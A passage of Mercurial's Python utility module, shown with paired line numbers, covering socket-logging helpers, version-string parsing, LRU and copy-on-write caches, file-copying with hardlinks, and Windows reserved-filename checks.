1064 1064 if not self.writes:
1065 1065 return
1066 1066
1067 1067 if address:
1068 1068 flags = flagsoraddress
1069 1069 else:
1070 1070 flags = 0
1071 1071
1072 1072 if self.logdataapis:
1073 1073 self.fh.write(
1074 1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 1075 % (self.name, len(data), flags, address, res)
1076 1076 )
1077 1077
1078 1078 self._writedata(data)
1079 1079
1080 1080 def setblocking(self, res, flag):
1081 1081 if not self.states:
1082 1082 return
1083 1083
1084 1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085 1085
1086 1086 def settimeout(self, res, value):
1087 1087 if not self.states:
1088 1088 return
1089 1089
1090 1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091 1091
1092 1092 def gettimeout(self, res):
1093 1093 if not self.states:
1094 1094 return
1095 1095
1096 1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097 1097
1098 1098 def setsockopt(self, res, level, optname, value):
1099 1099 if not self.states:
1100 1100 return
1101 1101
1102 1102 self.fh.write(
1103 1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 1104 % (self.name, level, optname, value, res)
1105 1105 )
1106 1106
1107 1107
1108 1108 def makeloggingsocket(
1109 1109 logh,
1110 1110 fh,
1111 1111 name,
1112 1112 reads=True,
1113 1113 writes=True,
1114 1114 states=True,
1115 1115 logdata=False,
1116 1116 logdataapis=True,
1117 1117 ):
1118 1118 """Turn a socket into a logging socket."""
1119 1119
1120 1120 observer = socketobserver(
1121 1121 logh,
1122 1122 name,
1123 1123 reads=reads,
1124 1124 writes=writes,
1125 1125 states=states,
1126 1126 logdata=logdata,
1127 1127 logdataapis=logdataapis,
1128 1128 )
1129 1129 return socketproxy(fh, observer)
1130 1130
1131 1131
1132 1132 def version():
1133 1133 """Return version information if available."""
1134 1134 try:
1135 1135 from . import __version__
1136 1136
1137 1137 return __version__.version
1138 1138 except ImportError:
1139 1139 return b'unknown'
1140 1140
1141 1141
1142 1142 def versiontuple(v=None, n=4):
1143 1143 """Parses a Mercurial version string into an N-tuple.
1144 1144
1145 1145 The version string to be parsed is specified with the ``v`` argument.
1146 1146 If it isn't defined, the current Mercurial version string will be parsed.
1147 1147
1148 1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1149 1149 returned values:
1150 1150
1151 1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, 1)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, 1, '190-df9b73d2d444')
1158 1158
1159 1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161 1161
1162 1162 >>> v = b'3.6'
1163 1163 >>> versiontuple(v, 2)
1164 1164 (3, 6)
1165 1165 >>> versiontuple(v, 3)
1166 1166 (3, 6, None)
1167 1167 >>> versiontuple(v, 4)
1168 1168 (3, 6, None, None)
1169 1169
1170 1170 >>> v = b'3.9-rc'
1171 1171 >>> versiontuple(v, 2)
1172 1172 (3, 9)
1173 1173 >>> versiontuple(v, 3)
1174 1174 (3, 9, None)
1175 1175 >>> versiontuple(v, 4)
1176 1176 (3, 9, None, 'rc')
1177 1177
1178 1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 1179 >>> versiontuple(v, 2)
1180 1180 (3, 9)
1181 1181 >>> versiontuple(v, 3)
1182 1182 (3, 9, None)
1183 1183 >>> versiontuple(v, 4)
1184 1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185 1185
1186 1186 >>> versiontuple(b'4.6rc0')
1187 1187 (4, 6, None, 'rc0')
1188 1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 1190 >>> versiontuple(b'.1.2.3')
1191 1191 (None, None, None, '.1.2.3')
1192 1192 >>> versiontuple(b'12.34..5')
1193 1193 (12, 34, None, '..5')
1194 1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 1195 (1, 2, 3, '.4.5.6')
1196 1196 """
1197 1197 if not v:
1198 1198 v = version()
1199 1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 1200 if not m:
1201 1201 vparts, extra = b'', v
1202 1202 elif m.group(2):
1203 1203 vparts, extra = m.groups()
1204 1204 else:
1205 1205 vparts, extra = m.group(1), None
1206 1206
1207 1207 assert vparts is not None # help pytype
1208 1208
1209 1209 vints = []
1210 1210 for i in vparts.split(b'.'):
1211 1211 try:
1212 1212 vints.append(int(i))
1213 1213 except ValueError:
1214 1214 break
1215 1215 # (3, 6) -> (3, 6, None)
1216 1216 while len(vints) < 3:
1217 1217 vints.append(None)
1218 1218
1219 1219 if n == 2:
1220 1220 return (vints[0], vints[1])
1221 1221 if n == 3:
1222 1222 return (vints[0], vints[1], vints[2])
1223 1223 if n == 4:
1224 1224 return (vints[0], vints[1], vints[2], extra)
1225 1225
1226 1226
1227 1227 def cachefunc(func):
1228 1228 '''cache the result of function calls'''
1229 1229 # XXX doesn't handle keywords args
1230 1230 if func.__code__.co_argcount == 0:
1231 1231 listcache = []
1232 1232
1233 1233 def f():
1234 1234 if len(listcache) == 0:
1235 1235 listcache.append(func())
1236 1236 return listcache[0]
1237 1237
1238 1238 return f
1239 1239 cache = {}
1240 1240 if func.__code__.co_argcount == 1:
1241 1241 # we gain a small amount of time because
1242 1242 # we don't need to pack/unpack the list
1243 1243 def f(arg):
1244 1244 if arg not in cache:
1245 1245 cache[arg] = func(arg)
1246 1246 return cache[arg]
1247 1247
1248 1248 else:
1249 1249
1250 1250 def f(*args):
1251 1251 if args not in cache:
1252 1252 cache[args] = func(*args)
1253 1253 return cache[args]
1254 1254
1255 1255 return f
1256 1256
1257 1257
1258 1258 class cow(object):
1259 1259 """helper class to make copy-on-write easier
1260 1260
1261 1261 Call preparewrite before doing any writes.
1262 1262 """
1263 1263
1264 1264 def preparewrite(self):
1265 1265 """call this before writes, return self or a copied new object"""
1266 1266 if getattr(self, '_copied', 0):
1267 1267 self._copied -= 1
1268 1268 return self.__class__(self)
1269 1269 return self
1270 1270
1271 1271 def copy(self):
1272 1272 """always do a cheap copy"""
1273 1273 self._copied = getattr(self, '_copied', 0) + 1
1274 1274 return self
1275 1275
1276 1276
1277 1277 class sortdict(collections.OrderedDict):
1278 1278 """a simple sorted dictionary
1279 1279
1280 1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 1281 >>> d2 = d1.copy()
1282 1282 >>> d2
1283 1283 sortdict([('a', 0), ('b', 1)])
1284 1284 >>> d2.update([(b'a', 2)])
1285 1285 >>> list(d2.keys()) # should still be in last-set order
1286 1286 ['b', 'a']
1287 1287 >>> d1.insert(1, b'a.5', 0.5)
1288 1288 >>> d1
1289 1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 1290 """
1291 1291
1292 1292 def __setitem__(self, key, value):
1293 1293 if key in self:
1294 1294 del self[key]
1295 1295 super(sortdict, self).__setitem__(key, value)
1296 1296
1297 1297 if pycompat.ispypy:
1298 1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 1299 def update(self, src):
1300 1300 if isinstance(src, dict):
1301 1301 src = pycompat.iteritems(src)
1302 1302 for k, v in src:
1303 1303 self[k] = v
1304 1304
1305 1305 def insert(self, position, key, value):
1306 1306 for (i, (k, v)) in enumerate(list(self.items())):
1307 1307 if i == position:
1308 1308 self[key] = value
1309 1309 if i >= position:
1310 1310 del self[k]
1311 1311 self[k] = v
1312 1312
1313 1313
1314 1314 class cowdict(cow, dict):
1315 1315 """copy-on-write dict
1316 1316
1317 1317 Be sure to call d = d.preparewrite() before writing to d.
1318 1318
1319 1319 >>> a = cowdict()
1320 1320 >>> a is a.preparewrite()
1321 1321 True
1322 1322 >>> b = a.copy()
1323 1323 >>> b is a
1324 1324 True
1325 1325 >>> c = b.copy()
1326 1326 >>> c is a
1327 1327 True
1328 1328 >>> a = a.preparewrite()
1329 1329 >>> b is a
1330 1330 False
1331 1331 >>> a is a.preparewrite()
1332 1332 True
1333 1333 >>> c = c.preparewrite()
1334 1334 >>> b is c
1335 1335 False
1336 1336 >>> b is b.preparewrite()
1337 1337 True
1338 1338 """
1339 1339
1340 1340
1341 1341 class cowsortdict(cow, sortdict):
1342 1342 """copy-on-write sortdict
1343 1343
1344 1344 Be sure to call d = d.preparewrite() before writing to d.
1345 1345 """
1346 1346
1347 1347
1348 1348 class transactional(object): # pytype: disable=ignored-metaclass
1349 1349 """Base class for making a transactional type into a context manager."""
1350 1350
1351 1351 __metaclass__ = abc.ABCMeta
1352 1352
1353 1353 @abc.abstractmethod
1354 1354 def close(self):
1355 1355 """Successfully closes the transaction."""
1356 1356
1357 1357 @abc.abstractmethod
1358 1358 def release(self):
1359 1359 """Marks the end of the transaction.
1360 1360
1361 1361 If the transaction has not been closed, it will be aborted.
1362 1362 """
1363 1363
1364 1364 def __enter__(self):
1365 1365 return self
1366 1366
1367 1367 def __exit__(self, exc_type, exc_val, exc_tb):
1368 1368 try:
1369 1369 if exc_type is None:
1370 1370 self.close()
1371 1371 finally:
1372 1372 self.release()
1373 1373
1374 1374
1375 1375 @contextlib.contextmanager
1376 1376 def acceptintervention(tr=None):
1377 1377 """A context manager that closes the transaction on InterventionRequired
1378 1378
1379 1379 If no transaction was provided, this simply runs the body and returns
1380 1380 """
1381 1381 if not tr:
1382 1382 yield
1383 1383 return
1384 1384 try:
1385 1385 yield
1386 1386 tr.close()
1387 1387 except error.InterventionRequired:
1388 1388 tr.close()
1389 1389 raise
1390 1390 finally:
1391 1391 tr.release()
1392 1392
1393 1393
1394 1394 @contextlib.contextmanager
1395 1395 def nullcontextmanager(enter_result=None):
1396 1396 yield enter_result
1397 1397
1398 1398
1399 1399 class _lrucachenode(object):
1400 1400 """A node in a doubly linked list.
1401 1401
1402 1402 Holds a reference to nodes on either side as well as a key-value
1403 1403 pair for the dictionary entry.
1404 1404 """
1405 1405
1406 1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407 1407
1408 1408 def __init__(self):
1409 1409 self.next = None
1410 1410 self.prev = None
1411 1411
1412 1412 self.key = _notset
1413 1413 self.value = None
1414 1414 self.cost = 0
1415 1415
1416 1416 def markempty(self):
1417 1417 """Mark the node as emptied."""
1418 1418 self.key = _notset
1419 1419 self.value = None
1420 1420 self.cost = 0
1421 1421
1422 1422
1423 1423 class lrucachedict(object):
1424 1424 """Dict that caches most recent accesses and sets.
1425 1425
1426 1426 The dict consists of an actual backing dict - indexed by original
1427 1427 key - and a doubly linked circular list defining the order of entries in
1428 1428 the cache.
1429 1429
1430 1430 The head node is the newest entry in the cache. If the cache is full,
1431 1431 we recycle head.prev and make it the new head. Cache accesses result in
1432 1432 the node being moved to before the existing head and being marked as the
1433 1433 new head node.
1434 1434
1435 1435 Items in the cache can be inserted with an optional "cost" value. This is
1436 1436 simply an integer that is specified by the caller. The cache can be queried
1437 1437 for the total cost of all items presently in the cache.
1438 1438
1439 1439 The cache can also define a maximum cost. If a cache insertion would
1440 1440 cause the total cost of the cache to go beyond the maximum cost limit,
1441 1441 nodes will be evicted to make room for the new code. This can be used
1442 1442 to e.g. set a max memory limit and associate an estimated bytes size
1443 1443 cost to each item in the cache. By default, no maximum cost is enforced.
1444 1444 """
1445 1445
1446 1446 def __init__(self, max, maxcost=0):
1447 1447 self._cache = {}
1448 1448
1449 1449 self._head = head = _lrucachenode()
1450 1450 head.prev = head
1451 1451 head.next = head
1452 1452 self._size = 1
1453 1453 self.capacity = max
1454 1454 self.totalcost = 0
1455 1455 self.maxcost = maxcost
1456 1456
1457 1457 def __len__(self):
1458 1458 return len(self._cache)
1459 1459
1460 1460 def __contains__(self, k):
1461 1461 return k in self._cache
1462 1462
1463 1463 def __iter__(self):
1464 1464 # We don't have to iterate in cache order, but why not.
1465 1465 n = self._head
1466 1466 for i in range(len(self._cache)):
1467 1467 yield n.key
1468 1468 n = n.next
1469 1469
1470 1470 def __getitem__(self, k):
1471 1471 node = self._cache[k]
1472 1472 self._movetohead(node)
1473 1473 return node.value
1474 1474
1475 1475 def insert(self, k, v, cost=0):
1476 1476 """Insert a new item in the cache with optional cost value."""
1477 1477 node = self._cache.get(k)
1478 1478 # Replace existing value and mark as newest.
1479 1479 if node is not None:
1480 1480 self.totalcost -= node.cost
1481 1481 node.value = v
1482 1482 node.cost = cost
1483 1483 self.totalcost += cost
1484 1484 self._movetohead(node)
1485 1485
1486 1486 if self.maxcost:
1487 1487 self._enforcecostlimit()
1488 1488
1489 1489 return
1490 1490
1491 1491 if self._size < self.capacity:
1492 1492 node = self._addcapacity()
1493 1493 else:
1494 1494 # Grab the last/oldest item.
1495 1495 node = self._head.prev
1496 1496
1497 1497 # At capacity. Kill the old entry.
1498 1498 if node.key is not _notset:
1499 1499 self.totalcost -= node.cost
1500 1500 del self._cache[node.key]
1501 1501
1502 1502 node.key = k
1503 1503 node.value = v
1504 1504 node.cost = cost
1505 1505 self.totalcost += cost
1506 1506 self._cache[k] = node
1507 1507 # And mark it as newest entry. No need to adjust order since it
1508 1508 # is already self._head.prev.
1509 1509 self._head = node
1510 1510
1511 1511 if self.maxcost:
1512 1512 self._enforcecostlimit()
1513 1513
1514 1514 def __setitem__(self, k, v):
1515 1515 self.insert(k, v)
1516 1516
1517 1517 def __delitem__(self, k):
1518 1518 self.pop(k)
1519 1519
1520 1520 def pop(self, k, default=_notset):
1521 1521 try:
1522 1522 node = self._cache.pop(k)
1523 1523 except KeyError:
1524 1524 if default is _notset:
1525 1525 raise
1526 1526 return default
1527 1527
1528 1528 assert node is not None # help pytype
1529 1529 value = node.value
1530 1530 self.totalcost -= node.cost
1531 1531 node.markempty()
1532 1532
1533 1533 # Temporarily mark as newest item before re-adjusting head to make
1534 1534 # this node the oldest item.
1535 1535 self._movetohead(node)
1536 1536 self._head = node.next
1537 1537
1538 1538 return value
1539 1539
1540 1540 # Additional dict methods.
1541 1541
1542 1542 def get(self, k, default=None):
1543 1543 try:
1544 1544 return self.__getitem__(k)
1545 1545 except KeyError:
1546 1546 return default
1547 1547
1548 1548 def peek(self, k, default=_notset):
1549 1549 """Get the specified item without moving it to the head
1550 1550
1551 1551 Unlike get(), this doesn't mutate the internal state. But be aware
1552 1552 that it doesn't mean peek() is thread safe.
1553 1553 """
1554 1554 try:
1555 1555 node = self._cache[k]
1556 1556 return node.value
1557 1557 except KeyError:
1558 1558 if default is _notset:
1559 1559 raise
1560 1560 return default
1561 1561
1562 1562 def clear(self):
1563 1563 n = self._head
1564 1564 while n.key is not _notset:
1565 1565 self.totalcost -= n.cost
1566 1566 n.markempty()
1567 1567 n = n.next
1568 1568
1569 1569 self._cache.clear()
1570 1570
1571 1571 def copy(self, capacity=None, maxcost=0):
1572 1572 """Create a new cache as a copy of the current one.
1573 1573
1574 1574 By default, the new cache has the same capacity as the existing one.
1575 1575 But, the cache capacity can be changed as part of performing the
1576 1576 copy.
1577 1577
1578 1578 Items in the copy have an insertion/access order matching this
1579 1579 instance.
1580 1580 """
1581 1581
1582 1582 capacity = capacity or self.capacity
1583 1583 maxcost = maxcost or self.maxcost
1584 1584 result = lrucachedict(capacity, maxcost=maxcost)
1585 1585
1586 1586 # We copy entries by iterating in oldest-to-newest order so the copy
1587 1587 # has the correct ordering.
1588 1588
1589 1589 # Find the first non-empty entry.
1590 1590 n = self._head.prev
1591 1591 while n.key is _notset and n is not self._head:
1592 1592 n = n.prev
1593 1593
1594 1594 # We could potentially skip the first N items when decreasing capacity.
1595 1595 # But let's keep it simple unless it is a performance problem.
1596 1596 for i in range(len(self._cache)):
1597 1597 result.insert(n.key, n.value, cost=n.cost)
1598 1598 n = n.prev
1599 1599
1600 1600 return result
1601 1601
1602 1602 def popoldest(self):
1603 1603 """Remove the oldest item from the cache.
1604 1604
1605 1605 Returns the (key, value) describing the removed cache entry.
1606 1606 """
1607 1607 if not self._cache:
1608 1608 return
1609 1609
1610 1610 # Walk the linked list backwards starting at tail node until we hit
1611 1611 # a non-empty node.
1612 1612 n = self._head.prev
1613 1613 while n.key is _notset:
1614 1614 n = n.prev
1615 1615
1616 1616 assert n is not None # help pytype
1617 1617
1618 1618 key, value = n.key, n.value
1619 1619
1620 1620 # And remove it from the cache and mark it as empty.
1621 1621 del self._cache[n.key]
1622 1622 self.totalcost -= n.cost
1623 1623 n.markempty()
1624 1624
1625 1625 return key, value
1626 1626
1627 1627 def _movetohead(self, node):
1628 1628 """Mark a node as the newest, making it the new head.
1629 1629
1630 1630 When a node is accessed, it becomes the freshest entry in the LRU
1631 1631 list, which is denoted by self._head.
1632 1632
1633 1633 Visually, let's make ``N`` the new head node (* denotes head):
1634 1634
1635 1635 previous/oldest <-> head <-> next/next newest
1636 1636
1637 1637 ----<->--- A* ---<->-----
1638 1638 | |
1639 1639 E <-> D <-> N <-> C <-> B
1640 1640
1641 1641 To:
1642 1642
1643 1643 ----<->--- N* ---<->-----
1644 1644 | |
1645 1645 E <-> D <-> C <-> B <-> A
1646 1646
1647 1647 This requires the following moves:
1648 1648
1649 1649 C.next = D (node.prev.next = node.next)
1650 1650 D.prev = C (node.next.prev = node.prev)
1651 1651 E.next = N (head.prev.next = node)
1652 1652 N.prev = E (node.prev = head.prev)
1653 1653 N.next = A (node.next = head)
1654 1654 A.prev = N (head.prev = node)
1655 1655 """
1656 1656 head = self._head
1657 1657 # C.next = D
1658 1658 node.prev.next = node.next
1659 1659 # D.prev = C
1660 1660 node.next.prev = node.prev
1661 1661 # N.prev = E
1662 1662 node.prev = head.prev
1663 1663 # N.next = A
1664 1664 # It is tempting to do just "head" here, however if node is
1665 1665 # adjacent to head, this will do bad things.
1666 1666 node.next = head.prev.next
1667 1667 # E.next = N
1668 1668 node.next.prev = node
1669 1669 # A.prev = N
1670 1670 node.prev.next = node
1671 1671
1672 1672 self._head = node
1673 1673
1674 1674 def _addcapacity(self):
1675 1675 """Add a node to the circular linked list.
1676 1676
1677 1677 The new node is inserted before the head node.
1678 1678 """
1679 1679 head = self._head
1680 1680 node = _lrucachenode()
1681 1681 head.prev.next = node
1682 1682 node.prev = head.prev
1683 1683 node.next = head
1684 1684 head.prev = node
1685 1685 self._size += 1
1686 1686 return node
1687 1687
1688 1688 def _enforcecostlimit(self):
1689 1689 # This should run after an insertion. It should only be called if total
1690 1690 # cost limits are being enforced.
1691 1691 # The most recently inserted node is never evicted.
1692 1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 1693 return
1694 1694
1695 1695 # This is logically equivalent to calling popoldest() until we
1696 1696 # free up enough cost. We don't do that since popoldest() needs
1697 1697 # to walk the linked list and doing this in a loop would be
1698 1698 # quadratic. So we find the first non-empty node and then
1699 1699 # walk nodes until we free up enough capacity.
1700 1700 #
1701 1701 # If we only removed the minimum number of nodes to free enough
1702 1702 # cost at insert time, chances are high that the next insert would
1703 1703 # also require pruning. This would effectively constitute quadratic
1704 1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 1705 # target cost that is a percentage of the max cost. This will tend
1706 1706 # to free more nodes when the high water mark is reached, which
1707 1707 # lowers the chances of needing to prune on the subsequent insert.
1708 1708 targetcost = int(self.maxcost * 0.75)
1709 1709
1710 1710 n = self._head.prev
1711 1711 while n.key is _notset:
1712 1712 n = n.prev
1713 1713
1714 1714 while len(self) > 1 and self.totalcost > targetcost:
1715 1715 del self._cache[n.key]
1716 1716 self.totalcost -= n.cost
1717 1717 n.markempty()
1718 1718 n = n.prev
1719 1719
1720 1720
1721 1721 def lrucachefunc(func):
1722 1722 '''cache most recent results of function calls'''
1723 1723 cache = {}
1724 1724 order = collections.deque()
1725 1725 if func.__code__.co_argcount == 1:
1726 1726
1727 1727 def f(arg):
1728 1728 if arg not in cache:
1729 1729 if len(cache) > 20:
1730 1730 del cache[order.popleft()]
1731 1731 cache[arg] = func(arg)
1732 1732 else:
1733 1733 order.remove(arg)
1734 1734 order.append(arg)
1735 1735 return cache[arg]
1736 1736
1737 1737 else:
1738 1738
1739 1739 def f(*args):
1740 1740 if args not in cache:
1741 1741 if len(cache) > 20:
1742 1742 del cache[order.popleft()]
1743 1743 cache[args] = func(*args)
1744 1744 else:
1745 1745 order.remove(args)
1746 1746 order.append(args)
1747 1747 return cache[args]
1748 1748
1749 1749 return f
1750 1750
1751 1751
1752 1752 class propertycache(object):
1753 1753 def __init__(self, func):
1754 1754 self.func = func
1755 1755 self.name = func.__name__
1756 1756
1757 1757 def __get__(self, obj, type=None):
1758 1758 result = self.func(obj)
1759 1759 self.cachevalue(obj, result)
1760 1760 return result
1761 1761
1762 1762 def cachevalue(self, obj, value):
1763 1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 1764 obj.__dict__[self.name] = value
1765 1765
1766 1766
1767 1767 def clearcachedproperty(obj, prop):
1768 1768 '''clear a cached property value, if one has been set'''
1769 1769 prop = pycompat.sysstr(prop)
1770 1770 if prop in obj.__dict__:
1771 1771 del obj.__dict__[prop]
1772 1772
1773 1773
1774 1774 def increasingchunks(source, min=1024, max=65536):
1775 1775 """return no less than min bytes per chunk while data remains,
1776 1776 doubling min after each chunk until it reaches max"""
1777 1777
1778 1778 def log2(x):
1779 1779 if not x:
1780 1780 return 0
1781 1781 i = 0
1782 1782 while x:
1783 1783 x >>= 1
1784 1784 i += 1
1785 1785 return i - 1
1786 1786
1787 1787 buf = []
1788 1788 blen = 0
1789 1789 for chunk in source:
1790 1790 buf.append(chunk)
1791 1791 blen += len(chunk)
1792 1792 if blen >= min:
1793 1793 if min < max:
1794 1794 min = min << 1
1795 1795 nmin = 1 << log2(blen)
1796 1796 if nmin > min:
1797 1797 min = nmin
1798 1798 if min > max:
1799 1799 min = max
1800 1800 yield b''.join(buf)
1801 1801 blen = 0
1802 1802 buf = []
1803 1803 if buf:
1804 1804 yield b''.join(buf)
1805 1805
1806 1806
1807 1807 def always(fn):
1808 1808 return True
1809 1809
1810 1810
1811 1811 def never(fn):
1812 1812 return False
1813 1813
1814 1814
1815 1815 def nogc(func):
1816 1816 """disable garbage collector
1817 1817
1818 1818 Python's garbage collector triggers a GC each time a certain number of
1819 1819 container objects (the number being defined by gc.get_threshold()) are
1820 1820 allocated even when marked not to be tracked by the collector. Tracking has
1821 1821 no effect on when GCs are triggered, only on what objects the GC looks
1822 1822 into. As a workaround, disable GC while building complex (huge)
1823 1823 containers.
1824 1824
1825 1825 This garbage collector issue have been fixed in 2.7. But it still affect
1826 1826 CPython's performance.
1827 1827 """
1828 1828
1829 1829 def wrapper(*args, **kwargs):
1830 1830 gcenabled = gc.isenabled()
1831 1831 gc.disable()
1832 1832 try:
1833 1833 return func(*args, **kwargs)
1834 1834 finally:
1835 1835 if gcenabled:
1836 1836 gc.enable()
1837 1837
1838 1838 return wrapper
1839 1839
1840 1840
1841 1841 if pycompat.ispypy:
1842 1842 # PyPy runs slower with gc disabled
1843 1843 nogc = lambda x: x
1844 1844
1845 1845
1846 1846 def pathto(root, n1, n2):
1847 1847 # type: (bytes, bytes, bytes) -> bytes
1848 1848 """return the relative path from one place to another.
1849 1849 root should use os.sep to separate directories
1850 1850 n1 should use os.sep to separate directories
1851 1851 n2 should use "/" to separate directories
1852 1852 returns an os.sep-separated path.
1853 1853
1854 1854 If n1 is a relative path, it's assumed it's
1855 1855 relative to root.
1856 1856 n2 should always be relative to root.
1857 1857 """
1858 1858 if not n1:
1859 1859 return localpath(n2)
1860 1860 if os.path.isabs(n1):
1861 1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 1862 return os.path.join(root, localpath(n2))
1863 1863 n2 = b'/'.join((pconvert(root), n2))
1864 1864 a, b = splitpath(n1), n2.split(b'/')
1865 1865 a.reverse()
1866 1866 b.reverse()
1867 1867 while a and b and a[-1] == b[-1]:
1868 1868 a.pop()
1869 1869 b.pop()
1870 1870 b.reverse()
1871 1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872 1872
1873 1873
1874 1874 def checksignature(func, depth=1):
1875 1875 '''wrap a function with code to check for calling errors'''
1876 1876
1877 1877 def check(*args, **kwargs):
1878 1878 try:
1879 1879 return func(*args, **kwargs)
1880 1880 except TypeError:
1881 1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 1882 raise error.SignatureError
1883 1883 raise
1884 1884
1885 1885 return check
1886 1886
1887 1887
1888 1888 # a whilelist of known filesystems where hardlink works reliably
1889 1889 _hardlinkfswhitelist = {
1890 1890 b'apfs',
1891 1891 b'btrfs',
1892 1892 b'ext2',
1893 1893 b'ext3',
1894 1894 b'ext4',
1895 1895 b'hfs',
1896 1896 b'jfs',
1897 1897 b'NTFS',
1898 1898 b'reiserfs',
1899 1899 b'tmpfs',
1900 1900 b'ufs',
1901 1901 b'xfs',
1902 1902 b'zfs',
1903 1903 }
1904 1904
1905 1905
1906 1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 1907 """copy a file, preserving mode and optionally other stat info like
1908 1908 atime/mtime
1909 1909
1910 1910 checkambig argument is used with filestat, and is useful only if
1911 1911 destination file is guarded by any lock (e.g. repo.lock or
1912 1912 repo.wlock).
1913 1913
1914 1914 copystat and checkambig should be exclusive.
1915 1915 """
1916 1916 assert not (copystat and checkambig)
1917 1917 oldstat = None
1918 1918 if os.path.lexists(dest):
1919 1919 if checkambig:
1920 1920 oldstat = checkambig and filestat.frompath(dest)
1921 1921 unlink(dest)
1922 1922 if hardlink:
1923 1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 1924 # unless we are confident that dest is on a whitelisted filesystem.
1925 1925 try:
1926 1926 fstype = getfstype(os.path.dirname(dest))
1927 1927 except OSError:
1928 1928 fstype = None
1929 1929 if fstype not in _hardlinkfswhitelist:
1930 1930 hardlink = False
1931 1931 if hardlink:
1932 1932 try:
1933 1933 oslink(src, dest)
1934 1934 return
1935 1935 except (IOError, OSError):
1936 1936 pass # fall back to normal copy
1937 1937 if os.path.islink(src):
1938 1938 os.symlink(os.readlink(src), dest)
1939 1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 1940 # for them anyway
1941 1941 else:
1942 1942 try:
1943 1943 shutil.copyfile(src, dest)
1944 1944 if copystat:
1945 1945 # copystat also copies mode
1946 1946 shutil.copystat(src, dest)
1947 1947 else:
1948 1948 shutil.copymode(src, dest)
1949 1949 if oldstat and oldstat.stat:
1950 1950 newstat = filestat.frompath(dest)
1951 1951 if newstat.isambig(oldstat):
1952 1952 # stat of copied file is ambiguous to original one
1953 1953 advanced = (
1954 1954 oldstat.stat[stat.ST_MTIME] + 1
1955 1955 ) & 0x7FFFFFFF
1956 1956 os.utime(dest, (advanced, advanced))
1957 1957 except shutil.Error as inst:
1958 1958 raise error.Abort(stringutil.forcebytestr(inst))
1959 1959
1960 1960
1961 1961 def copyfiles(src, dst, hardlink=None, progress=None):
1962 1962 """Copy a directory tree using hardlinks if possible."""
1963 1963 num = 0
1964 1964
1965 1965 def settopic():
1966 1966 if progress:
1967 1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968 1968
1969 1969 if os.path.isdir(src):
1970 1970 if hardlink is None:
1971 1971 hardlink = (
1972 1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 1973 )
1974 1974 settopic()
1975 1975 os.mkdir(dst)
1976 1976 for name, kind in listdir(src):
1977 1977 srcname = os.path.join(src, name)
1978 1978 dstname = os.path.join(dst, name)
1979 1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 1980 num += n
1981 1981 else:
1982 1982 if hardlink is None:
1983 1983 hardlink = (
1984 1984 os.stat(os.path.dirname(src)).st_dev
1985 1985 == os.stat(os.path.dirname(dst)).st_dev
1986 1986 )
1987 1987 settopic()
1988 1988
1989 1989 if hardlink:
1990 1990 try:
1991 1991 oslink(src, dst)
1992 1992 except (IOError, OSError):
1993 1993 hardlink = False
1994 1994 shutil.copy(src, dst)
1995 1995 else:
1996 1996 shutil.copy(src, dst)
1997 1997 num += 1
1998 1998 if progress:
1999 1999 progress.increment()
2000 2000
2001 2001 return hardlink, num
2002 2002
2003 2003
2004 2004 _winreservednames = {
2005 2005 b'con',
2006 2006 b'prn',
2007 2007 b'aux',
2008 2008 b'nul',
2009 2009 b'com1',
2010 2010 b'com2',
2011 2011 b'com3',
2012 2012 b'com4',
2013 2013 b'com5',
2014 2014 b'com6',
2015 2015 b'com7',
2016 2016 b'com8',
2017 2017 b'com9',
2018 2018 b'lpt1',
2019 2019 b'lpt2',
2020 2020 b'lpt3',
2021 2021 b'lpt4',
2022 2022 b'lpt5',
2023 2023 b'lpt6',
2024 2024 b'lpt7',
2025 2025 b'lpt8',
2026 2026 b'lpt9',
2027 2027 }
2028 2028 _winreservedchars = b':*?"<>|'
2029 2029
2030 2030
2031 2031 def checkwinfilename(path):
2032 2032 # type: (bytes) -> Optional[bytes]
2033 2033 r"""Check that the base-relative path is a valid filename on Windows.
2034 2034 Returns None if the path is ok, or a UI string describing the problem.
2035 2035
2036 2036 >>> checkwinfilename(b"just/a/normal/path")
2037 2037 >>> checkwinfilename(b"foo/bar/con.xml")
2038 2038 "filename contains 'con', which is reserved on Windows"
2039 2039 >>> checkwinfilename(b"foo/con.xml/bar")
2040 2040 "filename contains 'con', which is reserved on Windows"
2041 2041 >>> checkwinfilename(b"foo/bar/xml.con")
2042 2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 2043 "filename contains 'AUX', which is reserved on Windows"
2044 2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 2045 "filename contains ':', which is reserved on Windows"
